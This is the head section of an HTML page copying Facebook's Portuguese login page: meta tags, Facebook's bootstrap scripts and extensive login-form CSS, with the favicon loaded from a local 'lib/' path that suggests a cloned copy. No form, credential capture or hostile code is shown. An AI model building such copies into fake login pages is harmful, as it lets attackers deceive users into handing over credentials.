<!DOCTYPE html>
<html id="facebook" class="" lang="pt">
<head>
	<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<meta charset="utf-8">
	<meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
	
	<script nonce="">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXh5F_xi4LRoqszEKIE","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5y-ZxdpK3YJe6HnIw","isCQuick":false});</script>
	
	<script nonce="">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script>
	
	<style nonce=""></style>
	
	<script nonce="">__DEV__=0;</script>
	<noscript><meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" /></noscript>
	<link rel="manifest" id="MANIFEST_LINK" href="https://pt-br.facebook.com/data/manifest/" crossorigin="use-credentials">
	<title id="pageTitle">Facebook – entre ou cadastre-se</title>
	<meta property="og:site_name" content="Facebook">
	<meta property="og:url" content="https://pt-br.facebook.com/">
	<meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png">
	<meta property="og:locale" content="pt_BR">
	<link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/">
	<link rel="alternate" media="handheld" href="https://m.facebook.com/">
	<meta name="description" content="Entre no Facebook para começar a compartilhar e se conectar com seus amigos, familiares e com as pessoas que você conhece.">
	<link rel="canonical" href="https://pt-br.facebook.com/">
	<link rel="shortcut icon" href="lib/favicon.ico">


<style>
form{margin:0;padding:0}label{color:#606770;cursor:default;font-weight:600;vertical-align:middle}label input{font-weight:normal}textarea,.inputtext,.inputpassword{border:1px solid #ccd0d5;border-radius:0;margin:0;padding:3px}textarea{max-width:100%}select{border:1px solid #ccd0d5;padding:2px}input,select,textarea{background-color:#fff;color:#1c1e21}.inputtext,.inputpassword{padding-bottom:4px}.inputtext:invalid,.inputpassword:invalid{box-shadow:none}.inputradio{margin:0 5px 0 0;padding:0;vertical-align:middle}.inputcheckbox{border:0;vertical-align:middle}.inputbutton,.inputsubmit{background-color:#4267b2;border-color:#DADDE1 #0e1f5b #0e1f5b #d9dfea;border-style:solid;border-width:1px;color:#fff;padding:2px 15px 3px 15px;text-align:center}.inputaux{background:#ebedf0;border-color:#EBEDF0 #666 #666 #e7e7e7;color:#000}.inputsearch{background:#FFFFFF url(/rsrc.php/v3/yL/r/unHwF9CkMyM.png) no-repeat left 4px;padding-left:17px}
html{touch-action:manipulation}body{background:#fff;color:#1c1e21;direction:ltr;line-height:1.34;margin:0;padding:0;unicode-bidi:embed}body,button,input,label,select,td,textarea{font-family:Helvetica, Arial, sans-serif;font-size:12px}h1,h2,h3,h4,h5,h6{color:#1c1e21;font-size:13px;font-weight:600;margin:0;padding:0}h1{font-size:14px}h4,h5,h6{font-size:12px}p{margin:1em 0}b,strong{font-weight:600}a{color:#385898;cursor:pointer;text-decoration:none}button{margin:0}a:hover{text-decoration:underline}img{border:0}td,td.label{text-align:left}dd{color:#000}dt{color:#606770}ul{list-style-type:none;margin:0;padding:0}abbr{border-bottom:none;text-decoration:none}hr{background:#dadde1;border-width:0;color:#dadde1;height:1px}
.clearfix:after{clear:both;content:'.';display:block;font-size:0;height:0;line-height:0;visibility:hidden}.clearfix{zoom:1}.datawrap{word-wrap:break-word}.word_break{display:inline-block}.ellipsis{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.aero{opacity:.5}.column{float:left}.center{margin-left:auto;margin-right:auto}#facebook .hidden_elem{display:none!important}#facebook .invisible_elem{visibility:hidden}#facebook .accessible_elem{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute;white-space:nowrap;width:1px}#facebook .accessible_elem_offset{margin:-1px}.direction_ltr{direction:ltr}.direction_rtl{direction:rtl}.text_align_ltr{text-align:left}.text_align_rtl{text-align:right}
*::-moz-placeholder,*:-moz-placeholder{color:#606770}*:focus::-moz-placeholder,*:focus:-moz-placeholder{color:#bec3c9}.no_js *::-moz-placeholder,.no_js *:-moz-placeholder{color:#000}
body{overflow-y:scroll}.mini_iframe{overflow-y:visible}.auto_resize_iframe{height:auto;overflow:hidden}.pipe{color:gray;padding:0 3px}#content{margin:0;outline:none;padding:0;width:auto}.profile #content,.home #content,.search #content{min-height:600px}.UIStandardFrame_Container{margin:0 auto;padding-top:20px;width:960px}.UIStandardFrame_Content{float:left;margin:0;padding:0;width:760px}.UIStandardFrame_SidebarAds{float:right;margin:0;padding:0;width:200px;word-wrap:break-word}.UIFullPage_Container{margin:0 auto;padding:20px 12px 0;width:940px}.empty_message{background:#f5f6f7;font-size:13px;line-height:17px;padding:20px 20px 50px;text-align:center}.see_all{text-align:right}.standard_status_element{visibility:hidden}.standard_status_element.async_saving{visibility:visible}img.tracking_pixel{height:1px;position:absolute;visibility:hidden;width:1px}
._li._li._li{overflow:initial}._910i._li._li._li{overflow:hidden}._9053 ._li._li._li{overflow-x:hidden}._72b0{position:relative;z-index:0}.registration ._li._9bpz{background-color:#f0f2f5}._li ._9bp-{padding-top:5px;text-align:center}._li ._9bp- .fb_logo{height:100px}._li ._a66f{padding-top:5px;text-align:center}._li ._a66f .fb_logo{height:80px;padding-top:72px}

._2agf{word-wrap:normal}._2agf._4o_4{display:inline-flex}._55pe{display:inline-block;overflow:hidden;text-overflow:ellipsis;vertical-align:top;white-space:nowrap}
._5f0v{outline:none}._3oxt{outline:1px dotted #3b5998;outline-color:invert}
._19_u :focus{outline:none!important}
i.img{-ms-high-contrast-adjust:none}i.img u{clip:rect(1px, 1px, 1px, 1px);height:1px;left:auto;overflow:hidden;position:absolute;white-space:nowrap;width:1px}
div._3qw{height:auto;left:0;min-height:100%;position:absolute;right:0;top:0;z-index:400}._31e{position:fixed!important;width:100%}._3ixn{bottom:0;left:0;position:fixed;right:0;top:0}._3qw ._3ixn{background-color:rgba(255, 255, 255, .8)}._3qx ._3ixn{background-color:rgba(0, 0, 0, .9)}._4-hy ._3ixn{background-color:rgba(0, 0, 0, .4)}._99rc ._3ixn{background-color:rgba(0, 0, 0, .5)}
._10{height:0;left:0;position:fixed;right:0;top:0;z-index:202}.platform_dialog ._10{position:absolute}._1yv{box-shadow:0 2px 26px rgba(0, 0, 0, .3), 0 0 0 1px rgba(0, 0, 0, .1);margin:0 auto 40px;position:relative}._t{background-color:#fff;position:relative}._1yw{background-color:#6d84b4;border:1px solid #365899;border-bottom:0;color:#fff;font-size:14px;font-weight:bold}._13,._14{border-color:#555;border-style:solid;border-width:0 1px}._13:first-child{border-top-width:1px}._13:last-child{border-bottom-width:1px}._14{border-bottom-width:1px}
.uiLayer{outline:none}
._1m42{display:block}._1w_m ._1m42 img,._53s ._1m42 i{filter:brightness(50%) blur(5px);transition:filter .5s ease-out}._5v3q ._1m42::before,._1m42::before{animation:rotateSpinner 1.2s linear infinite;background-image:url(/rsrc.php/v3/yH/r/xgVgalBG80z.png);border:0;content:'';display:inline-block;height:24px;left:50%;margin:-12px -12px;position:absolute;top:50%;width:24px;z-index:10}
.openToggler{z-index:100}.uiToggleFlyout,.toggleTargetClosed,.openToggler .uiToggleFlyout .uiToggleFlyout{display:none}.openToggler .uiToggleFlyout,.openToggler .uiToggleFlyout .openToggler .uiToggleFlyout{display:block}.hideToggler{border:0;height:0;opacity:0;overflow:hidden;pointer-events:none;position:absolute;width:0}
._9l2i ._9l2g,._9l2i ._1yv{border-radius:6px;box-shadow:0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);width:565px!important}._9l2i ._4t2a,._9l2i ._9l18{background-color:transparent}._9l2i ._9l19,._9l2i ._9l1d{box-sizing:border-box;margin:auto;width:565px}._9l2i ._9l1d ._9l16,._9l2i ._9l16{background-color:#fff;border-bottom:none;padding:18px 16px}._9l2i ._9l16 .clearfix{align-items:center;display:flex;justify-content:space-between}._9l2i ._9l16 .clearfix::after{display:none}._9l2i ._9l16 ._9l17{font-size:20px;line-height:24px}._9l2i ._9l16 ._9l15,._9l2i ._9l16 ._9l15:hover{background-color:#e4e6eb;background-image:url(/rsrc.php/v3/yn/r/J-J3z0h9x9f.png);background-position:center;background-repeat:no-repeat;background-size:20px;border-radius:50%;display:block;height:36px;width:36px}._9l2i ._9l16 ._9l15:hover{background-color:#bec3c9}._9l2i ._pig{padding:12px 16px}._9l2i ._pig ._9l1a{color:#606770;font-size:15px;line-height:19px}._9l2i ._5a8u{border-top:none;display:flex;justify-content:flex-end;margin:0 16px;padding:12px 0}._9l2i ._5a8u ._9l2h,._9l2i ._9l1d ._9l2j{align-items:center;background-color:#216fdb;border-radius:6px;box-sizing:border-box;display:flex;font-size:15px;height:36px;justify-content:center;line-height:20px;margin-left:20px;width:121px}._9l2i ._5a8u ._9l2k{align-items:center;background:transparent;border:none;box-sizing:border-box;color:#216fdb;display:flex;font-size:15px;height:36px;justify-content:center;line-height:20px;margin:0;padding:0}._9l2i ._5a8u ._9l2k:hover{background-color:transparent}._9l2i ._5a8u ._9l2k:after{display:none}
._59s7{background-color:#fff;border-radius:3px;box-shadow:0 2px 26px rgba(0, 0, 0, .3), 0 0 0 1px rgba(0, 0, 0, .1);font-family:Helvetica, Arial, sans-serif;margin:0 auto 40px;position:relative}._4t2a{background-color:#fff;border-radius:3px;position:relative}._4-i0{background-color:#f5f6f7;border-bottom:1px solid #e5e5e5;border-radius:3px 3px 0 0;color:#1d2129;font-weight:bold;line-height:19px;padding:10px 12px}._4-i0 ._ohe{max-width:100%}._2gb3 ._ohe{max-width:calc(100% - 40px)}._4-i0 ._52c9{color:#1d2129;font-size:14px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}._2g9z{padding:6px 8px}._4-i0 ._2g9-{padding:4px}._2g9_{margin-top:4px}._2qes{float:left}._2qet{display:inline-block;line-height:25px;margin-left:10px;vertical-align:middle}._4-i0._5dwa{line-height:12px}._4-i0._5dwa ul{float:left}div._4-i2{background-color:#fff;word-wrap:break-word}div._4-i2 div[role='document']{outline:none}._5pfh{overflow-y:auto}._pig{padding:12px}._4-i2:first-child{border-radius:3px 3px 0 0}._4-i2:last-child{border-radius:0 0 3px 3px}._4-i0.accessible_elem:first-child+._4-i2:last-child,._4-i2:only-child{border-radius:3px}div._5a8u{background-color:#fff;padding:12px 0}html ._27qq{border-radius:0 0 3px 3px;margin:0;padding:12px 12px}._3thl{overflow:hidden}
@keyframes CSSFade_show{0%{opacity:0}100%{opacity:1}}@keyframes CSSFade_hide{0%{opacity:1}100%{opacity:0}}
._42ft{cursor:pointer;display:inline-block;text-decoration:none;white-space:nowrap}._42ft::-moz-focus-inner{border:0;padding:0}.gecko ._42ft:focus{outline:1px dotted #3b5998;outline-color:invert}._42ft:hover{text-decoration:none}._42ft+._42ft{margin-left:4px}._42fr,._42fs{cursor:default}._afhc{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute;white-space:nowrap;width:1px}
._4qba{font-style:inherit}._4qbb,._4qbc,._4qbd{background:none;font-style:inherit;padding:0;width:auto}._4qbd{border-bottom:1px solid #f99}._4qbb,._4qbc{border-bottom:1px solid #999}._4qbb:hover,._4qbc:hover,._4qbd:hover{background-color:#fcc;border-top:1px solid #ccc;cursor:help}
._4jnw{margin:0}._3-8h{margin:4px}._3-8i{margin:8px}._3-8j{margin:12px}._3-8k{margin:16px}._3-8l{margin:20px}._2-5b{margin:24px}._1kbd{margin-bottom:0;margin-top:0}._3-8m{margin-bottom:4px;margin-top:4px}._3-8n{margin-bottom:8px;margin-top:8px}._3-8o{margin-bottom:12px;margin-top:12px}._3-8p{margin-bottom:16px;margin-top:16px}._3-8q{margin-bottom:20px;margin-top:20px}._2-ox{margin-bottom:24px;margin-top:24px}._1a4i{margin-left:0;margin-right:0}._3-8r{margin-left:4px;margin-right:4px}._3-8s{margin-left:8px;margin-right:8px}._3-8t{margin-left:12px;margin-right:12px}._3-8u{margin-left:16px;margin-right:16px}._3-8v{margin-left:20px;margin-right:20px}._6bu9{margin-left:24px;margin-right:24px}._5soe{margin-top:0}._3-8w{margin-top:4px}._3-8x{margin-top:8px}._3-8y{margin-top:12px}._3-8z{margin-top:16px}._3-8-{margin-top:20px}._4aws{margin-top:24px}._2-jz{margin-right:0}._3-8_{margin-right:4px}._3-90{margin-right:8px}._3-91{margin-right:12px}._3-92{margin-right:16px}._3-93{margin-right:20px}._y8t{margin-right:24px}._5emk{margin-bottom:0}._3-94{margin-bottom:4px}._3-95{margin-bottom:8px}._3-96{margin-bottom:12px}._3-97{margin-bottom:16px}._3-98{margin-bottom:20px}._20nr{margin-bottom:24px}._av_{margin-left:0}._3-99{margin-left:4px}._3-9a{margin-left:8px}._3-9b{margin-left:12px}._3-9c{margin-left:16px}._3-9d{margin-left:20px}._4m0t{margin-left:24px}._a82f{margin-left:28px}/*FB_PKG_DELIM*/

#bootloader_PiJwqCo{height:42px;}.bootloader_PiJwqCo{display:block!important;
}
.fbIndex .uiWashLayoutBlueWash{background-color:#c4d2e7}.fbIndex .contentContainer{margin:0 auto 0 auto;width:980px}.fbIndex .bodyWash{margin-bottom:0}.fbIndex .locales{margin:10px auto 0;width:980px}.fbIndex .gradient{background:url(/rsrc.php/v3/yB/r/TwAHgQi2ZPB.png) 0 bottom repeat-x;background:linear-gradient(white, #d3d8e8)}.fbIndex .gradient{min-width:980px}.fbIndex .gradient .gradientContent{margin:0 auto;position:relative;width:980px}
._8esj{background:#edf0f5}._95k9{background:#f0f2f5;min-width:500px}._8ien{background-color:transparent;overflow:visible;padding:0;width:432px}._8esf._8fgk ._8esl{width:548px}._8esf._8fgk._8ilg ._8esl{width:580px}._8fgk._8idq ._3ixn{background-color:rgba(255, 255, 255, .8)}._8ien ._8idr{position:absolute;right:10px;top:12px;z-index:2}._8esf.gradient{background:#edf0f5}._8icx{padding-top:82px}._8op_{padding-bottom:40px;padding-top:62px}._95ka{padding-bottom:112px;padding-top:72px}._95kb{padding-bottom:132px;padding-top:92px}._8op_._8fgk{padding-bottom:20px}._8fgk._8fgk,._8esj._8fgk,._8fgk.gradient{background:#fff}._8idq._8fgk,._8idq._8esj._8fgk,._8idq._8fgk.gradient{background:transparent}._8esk{margin:0 auto;padding:20px 0;position:relative;width:980px}._8esl{display:inline-block;margin-right:15.999px;vertical-align:top;width:565px}._8esf ._8esl{box-sizing:border-box;margin-right:0;padding-right:32px;width:580px}._8esm{display:inline-block;vertical-align:top;width:399px}._8fgk ._8esm{width:432px}._8esn{display:inline-block;vertical-align:top}#facebook ._8esj ._8eso{color:#333;display:inline-block;font-family:'Freight Sans Bold', Helvetica, Arial, sans-serif;font-size:28px;font-weight:bold;letter-spacing:normal;line-height:36px;padding:42px 0 24px;text-rendering:optimizelegibility;width:456px}#facebook ._8esj._8esf._8ilg ._8eso{font-size:24px;line-height:32px;padding:60px 0 20px}#facebook ._8esj._8esf._8icx ._8eso{font-size:24px;line-height:32px;padding:0 0 20px}#facebook ._8esj._8esf._8icx ._8icy ._8eso{padding-bottom:12px}#facebook ._8esj._8icx ._8eso{padding-top:0}#facebook ._8icx ._8ice{padding:0 0 24px}#facebook ._8icx._8opv ._8ice{padding:112px 0 16px}#facebook ._95kc._8icx ._8ice{padding:8px 0 16px 0}#facebook ._8esj._8esf ._8eso{color:#1c1e21;font-family:SFProDisplay-Bold, Helvetica, Arial, sans-serif;font-size:32px;font-weight:bold;line-height:38px;width:471px}#facebook ._8esj._8esf._8icx._8opv ._8eso{font-family:SFProDisplay-Regular, Helvetica, Arial, sans-serif;font-size:28px;font-weight:normal;line-height:32px;width:500px}._8icx ._8ilh{height:70px;margin:-20px}._8icx._8opv ._8ilh{height:106px;margin:-28px}._8fgk ._8fgn{align-items:center;border-radius:8px 8px 0 0;box-sizing:border-box;padding:10px 16px;position:relative;width:432px;z-index:1}#facebook ._8esj ._8est{color:#333;font-family:'Freight Sans Bold', Helvetica, Arial, sans-serif;font-size:36px;font-weight:bold;line-height:1.2;margin-bottom:5px}#facebook ._8esj._8esf ._8est{color:#1c1e21;font-family:SFProDisplay-Bold, Helvetica, Arial, sans-serif;font-size:32px;line-height:38px;margin-bottom:0}#facebook ._8esj ._8esu{color:#333;font-family:'Freight Sans', Helvetica, Arial, sans-serif;font-size:19px;line-height:1.26;margin-bottom:20px}#facebook ._8esj._8esf ._8esu{color:#606770;font-family:SFProText-Regular, Helvetica, Arial, sans-serif;font-size:15px;line-height:24px;margin-bottom:12px}#facebook ._8esj._8esf._8esj._8fgk ._8esu{margin-bottom:0}._95ke #pageFooterChildren a,._95ke .localeSelectorList a{color:#8a8d91}._8opy{padding-top:20px}._9bq7{display:inline}._9bq8{background-color:#fff;padding-top:30px}._8esf._8fgk,._8esf._9bpz{padding-top:25px}._8esf._9bq9{padding-top:5px}@media only screen and (max-width: 1075px){._8esk{height:496px;margin:0 40px;width:auto}._8esf ._8esl{width:400px}#facebook ._8esj._8esf._8icx._8opv ._8eso{font-size:24px;line-height:28px;width:auto}._8esn{float:right}#facebook ._8opy #pageFooter{margin:0 40px;width:auto}}@media only screen and (max-width: 900px){._8esk{display:flex;flex-direction:column;text-align:center}._8esf ._8esl{margin:0 auto;padding:0}#facebook ._8icx._8opv ._8ice{padding:0 0 20px 0}#facebook ._8esj._8esf._8icx._8opv ._8eso{padding:0}._8esn{float:none;margin:0 auto}._95ka{padding-bottom:164px;padding-top:20px}._95kb{padding-bottom:80px;padding-top:20px}}
.login_page .title_header{margin:0 0 10px 0;padding:0 0 10px 0}.login_page .title_header h2.no_icon{background:transparent none repeat scroll 0%;margin:0;padding:0}.login_page #loginform{clear:left;margin:auto;padding:15px 0;text-align:left;width:380px}.login_page #signup_area{clear:left;margin:auto;width:380px}.login_page .signup_button{float:left}.login_page .signup_text{float:left;width:200px;margin:0 0 20px 10px}.login_page hr{width:280px;margin-left:0}.login_page #loginform p{line-height:16px;margin:10px 0;text-align:left}.login_page #loginform p.reset_password{margin-bottom:0;padding-bottom:0}.login_page .apinote{margin:10px auto;width:450px;background:#fff}.login_page .apinote h2{font-size:12px;margin-bottom:6px}.login_page .login_form_container .dialog_buttons{background-color:#f5f6f7;border-top:1px solid #ccc;bottom:0;left:0;margin:0;padding:8px 10px;position:absolute;right:0;text-align:right}.login_page .dialog_buttons .logged_in_as{float:left;width:240px;margin-top:3px;text-align:left}.login_page .dialog_buttons .register_link{float:left;text-align:left;margin-top:4px;font-weight:bold}.login_page #email{direction:ltr}.login_page #error{margin-top:20px}div.login_page_interstitial{margin-bottom:0;margin-top:0;width:640px}.login_page .login_message{margin:auto;width:640px}.login_page #booklet #content{float:none;margin-bottom:46px;padding:15px 30px 20px 30px;width:auto}.login_page #booklet #loginform{margin-top:20px;padding-top:0}.login_page #booklet #dialog_buttons input{margin:0}.form_row{padding:0 0 8px 0;text-align:left}.form_row .login_form_label{display:block;float:left;padding:3px 0;width:100px}.form_row input{margin:0}.form_row .inputtext,.inputpassword{width:175px}.form_row .checkbox{float:left;width:15px;margin:5px 4px 2px 0}.persistent{padding:3px 0 3px 100px;text-align:left}#login_button_inline{float:left;margin-bottom:5px;margin-right:5px}#register_link{margin-top:5px;float:left}#buttons{padding:5px 0 0 100px;text-align:left}#buttons .uiButton{margin-right:2px}#buttons label{float:none;width:auto}.reset_password,.not_me_link{padding-left:100px}.reset_password label{float:none;font-weight:normal;width:auto}.reset #content{padding:20px}.login_error_box{margin-top:10px}::-ms-reveal{display:none}
._6luv{align-items:center;background-color:#fff;border:none;border-radius:8px;box-shadow:0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);box-sizing:border-box;margin:40px 0 0;padding:20px 0 28px;width:396px}._8icy ._6luv{padding-bottom:24px;padding-top:10px}._8iep{height:456px;width:396px}#facebook ._8iep ._8opt{font-family:SFProDisplay-Semibold, Helvetica, Arial, sans-serif;font-size:15px;line-height:20px;padding-bottom:4px;text-align:left}._6lux{display:inline-block;font-size:14px;margin:auto;padding:6px 0;width:302px}._6lux ::-ms-reveal{display:none}._8icy ._6lux{font-size:17px;width:364px}._9aha ._6lux{font-size:17px;width:368px}._6lux ._6luy{font-size:14px;padding:5px 8px;width:284px}._8icy ._6lux ._6luy{font-size:17px;padding:14px 16px;width:330px}._9aha ._6lux ._6luy{font-size:17px;padding:14px 16px;width:334px}._8icy._9ahz ._6lux ._6luy:focus,._9aha ._6lux ._6luy:focus{border-color:#1b74e4;box-shadow:0 0 0 2px #e7f3ff;caret-color:#1b74e4}._8icy ._6lux ._6luy,._9aha ._6lux ._6luy{border-radius:6px}._6ltg{padding-top:6px}._6lth{font-size:14px;width:252px}._8icy ._6lth{background-color:#1877f2;border:none;border-radius:6px;font-size:20px;line-height:48px;padding:0 16px;width:332px}._8icy._9ah- ._6lth:hover{background-color:#166fe5}._6lti{font-size:14px}._8icy ._6lti{border:none;border-radius:6px;font-size:17px;line-height:48px;padding:0 16px}._6ltj{margin-top:12px}._8icy ._6ltj{margin-top:16px}._8icy ._6ltj a{color:#1877f2;font-size:14px;font-weight:500}._8icy ._8icz{align-items:center;border-bottom:1px solid #dadde1;display:flex;margin:20px 16px;text-align:center}@media only screen and (max-width: 900px){._95kb ._6luv{margin-top:4px}}
._39il.login_page #loginform{padding:0;text-align:center}._39il.login_page .persistent{padding:18px 0;text-align:center}._97vu{margin:-44px 0 -4px 0;width:240px}._97vy{text-align:center}._97vz ._1w1t{border-radius:8px;box-shadow:0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);margin:auto;padding:0 0 14px 0;width:396px}._97v- ._5466{width:364px}._39il._97v_ ._52e0{background-color:#1877f2;border:none;border-radius:6px;font-size:20px;line-height:48px;padding:0 16px;width:332px}#facebook ._39il._97v_ ._52e0:hover{background-color:#166fe5}._1w1t{margin:auto;padding:22px 108px 26px;width:396px}._41-v ._1w1t{margin-top:88px;padding:22px 8px 26px}._1uxu{margin:auto;width:612px}._39il ._xkt ._82gm{bottom:10px;height:20px;left:10px;position:absolute;width:20px}._39il ._82go{background-color:#fff;border-radius:2px;font-size:14px;width:314px}._39il ._52e0{font-size:14px;width:252px}._xkt{padding:6px 0}._39il ._82gv{color:#606770;font-size:12px;line-height:16px;padding:2px 40px}._16jx{font-size:14px}._97v_ ._16jx{border:none;border-radius:6px;font-size:17px;line-height:48px;padding:0 16px}._xku{padding:18px 0}._85el{padding:18px 0 16px 0}._97w0 ._xku{padding:24px 0 16px 0}._97w0 ._85el{padding:12px 0 18px 0}#facebook ._97w0 ._97w1{font-family:SFProDisplay-Regular, Helvetica, Arial, sans-serif}._9axy._97w0 ._xku{padding-left:16px;padding-right:16px
}
._9axy._97w0{
font-size:25px;
font-weight:bold;
line-height:28px
}
._9axz{
font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
font-size:18px;
line-height:22px
}
._85em{padding-top:6px}._5466{margin:auto}._xkv{padding:6px 0}._97w2 ._xkv{padding:12px 0 18px}._97w3{padding:6px 0}._97w2 ._97w3{padding:10px 0 2px}._97w2 ._85em ._97w3{padding:6px 0 18px}._97w2 ._97w4,._97w2 ._97w5{color:#1877f2;font-size:14px;font-weight:500}._97w2 #not_me_link{color:#1877f2}._97w2 ._97w6{color:#1877f2;font-weight:500}._1rf5{display:block;margin-bottom:10px;margin-left:10.5%;margin-right:10.5%;margin-top:10px;overflow:hidden;text-align:center;white-space:nowrap;width:79%}._97vz ._1rf5{margin-left:8px;margin-right:8px;width:auto}._82qp ._82qq{margin-bottom:16px;margin-top:16px}._1rf5>span{display:inline-block;position:relative}._1rf5>span:before,._1rf5>span:after{background:#ccd0d5;content:'';height:1px;position:absolute;top:50%;width:9999px}._9ax- ._1rf5>span:before,._9ax- ._1rf5>span:after{background:#d7dade}._1rf5>span:before{margin-right:15px;right:100%}._1rf5>span:after{left:100%;margin-left:15px}._1rf8{color:#4b4f56}._9ax- ._1rf8{color:#96999e}._9ax_ ._9ay0{border:1px solid rgba(0, 0, 0, .1)}._9ay1 ._9ay2,._9ay1 ._9ay3{margin:4px 16px 6px 16px}._9ay1 ._9ay2 a,._9ay1 ._9ay3 a{color:#1877f2}
._5jb3{background-color:#fff;font-size:13px;width:100%}._5jb3 input{height:22px;line-height:16px;padding:10px 13px}._5jb3 .placeholder{padding:10px 13px}._5jb4 input,._5jb5 input{border:1px solid #d3d6db;font-size:14px;padding:5px 8px;width:284px}._5jb9{text-align:center}._70g9{text-align:center}._5jb_{height:10px}._5jc7{font-size:14px;margin-bottom:8px;margin-top:16px;padding:0 16px;width:252px}
._58mf{margin:0 auto 0 auto;padding-bottom:30px}._8ien ._58mf{padding-bottom:0}.timelineSignUpDialog ._58mf{padding-bottom:0}._58mf ._6o{font-size:19px}._58mf ._6p{font-size:17px}._2_68{color:#90949c;font-size:16px;font-weight:bold}#facebook ._58mf ._9hk6{-moz-appearance:none;background-image:url(/rsrc.php/v3/yP/r/Yrq8Y9PlN02.png);background-position:right 5px center;background-repeat:no-repeat;background-size:14px;padding:0 8px;padding-right:20px}#facebook ._58mf ._9hk6._9m5o{background-position:right 7px center;padding-right:8px}#facebook ._8esf ._2_68{color:#606770;font-family:SFProText-Medium, Helvetica, Arial, sans-serif;font-size:12px;font-weight:normal;line-height:20px;margin-bottom:0;margin-top:2px}#facebook ._8esf._9bpz ._2_68{margin-bottom:4px}._58mi{min-width:194px;padding:7px 20px;text-align:center}#facebook ._8esf ._58mi{font-family:SFProDisplay-Bold, Helvetica, Arial, sans-serif!important;font-weight:bold}._8esf ._58mi{background:none;background-color:#00a400;border:none;border-radius:6px;box-shadow:none;color:#fff;font-size:18px;font-weight:600;height:36px;overflow:hidden;padding:0 32px;text-shadow:none}._8f3m ._1lch{text-align:center}._8esf ._58mi:after{content:'';display:inline-block;height:36px;left:0;position:absolute;right:0;top:0;vertical-align:middle}._8esf ._58mi:hover:after{background-color:rgba(115, 129, 150, .15)}#facebook ._8esf ._58mi{font-family:SFProDisplay-Bold, Helvetica, Arial, sans-serif!important;font-weight:bold}#facebook ._8esf ._9bq4{padding:10px 0;position:relative;text-align:center}#facebook ._8esf ._9bq4 ._9bq5{color:#1877f2;font-family:SFProText-Semibold, Helvetica, Arial, sans-serif;font-size:17px;line-height:20px}#facebook ._8esf ._9bq4 ._9bq5:hover{text-decoration:none}._58mj{font-size:16px}._58mk{border-top:1px solid #dddfe2;color:#666;font-size:13px;font-weight:bold;margin-top:10px;padding-top:15px}#facebook ._8esf ._58mk{border-top:none;color:#1c1e21;font-family:SFProText-Regular, Helvetica, Arial, sans-serif;font-size:14px;font-weight:normal;padding-top:0}._8f3m ._58mk{margin-top:42px;text-align:center}._8ilg ._58mk,._8icx ._58mk{margin-top:28px;text-align:center}._8fgk ._8fgl,._9bpz ._8fgl{background-color:#fff;border-radius:0 0 8px 8px;border-top:1px solid #dadde1;box-sizing:border-box;padding:16px;position:relative;width:432px}._8fgk ._8fgl:before,._9bpz ._8fgl:before{background:transparent;border-radius:8px;bottom:0;box-shadow:0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);content:'';left:0;position:absolute;right:0;top:-77px;width:432px;z-index:0}._9l2p:before{pointer-events:none}#facebook ._8esf ._8esh{font-family:SFProText-Semibold, Helvetica, Arial, sans-serif;font-size:14px;font-weight:600}._8f3m ._8esh{color:inherit}._58ml{margin-left:10px;position:relative;top:3px}._58mm{float:left}._58mn{background:#ffebe8;border:1px solid #dd3c10;line-height:15px;margin:12px 0 12px 0;overflow:hidden;text-align:center}._58mo{padding:7px 3px}._2rs6 ._2rs9{font-weight:bold}._2rs6 ._2rsa{min-width:50px}._a4y{display:inline-block;position:relative}._a4y ._a4z{background-color:#fff;border:1px solid #1c1e21;border-radius:6px;box-shadow:0 3px 8px rgba(0, 0, 0, .3);color:#1c1e21;font-size:14px;opacity:0;padding:12px;position:absolute;right:105%;text-align:left;top:-5px;transition:opacity 1s;visibility:hidden;width:200px;z-index:1}._a4y ._a4z::before{border-color:transparent transparent transparent #1c1e21;border-style:solid;border-width:6px;content:' ';left:100%;margin-top:-6px;position:absolute;top:20%}._a4y ._a4z::after{border-color:transparent transparent transparent #fff;border-style:solid;border-width:5px;content:' ';left:100%;margin-top:-5px;position:absolute;top:20%}
._585n{background-color:#3578e5;border:1px solid #3578e5;border-radius:3px;overflow:hidden;padding:0 0 0 40px}._585o{background-color:#fa3e3e;border-color:#fa3e3e}._3qh4{background-color:#42b72a;border-color:#42b72a}._1wpa{background-color:#f79c2d;border-color:#f79c2d}._5d83{background-color:#ccd0d5;border-color:#ccd0d5}._585p{float:left;margin:8px 0 0 -30px}._585r{background:#fff;margin:0;padding:9px 10px}._2i-a{padding-right:30px}._585q{float:right;margin:12px 12px 0 0}._585n a{font-weight:bold}
.sp_vxiiSmFDFzJ{background-image:url(/rsrc.php/v3/ye/r/4rnXbyIZ7vG.png);background-size:auto;background-repeat:no-repeat;display:inline-block;height:20px;width:20px}.sp_vxiiSmFDFzJ.sx_082a2e{background-position:0 -43px}.sp_vxiiSmFDFzJ.sx_377c07{width:12px;height:12px;background-position:0 -64px}.sp_vxiiSmFDFzJ.sx_54bab3{background-position:-21px -43px}.sp_vxiiSmFDFzJ.sx_310f7b{width:42px;height:42px;background-position:0 0}/*FB_PKG_DELIM*/

#bootloader_RFcCAm_{height:42px;}.bootloader_RFcCAm_{display:block!important;
}
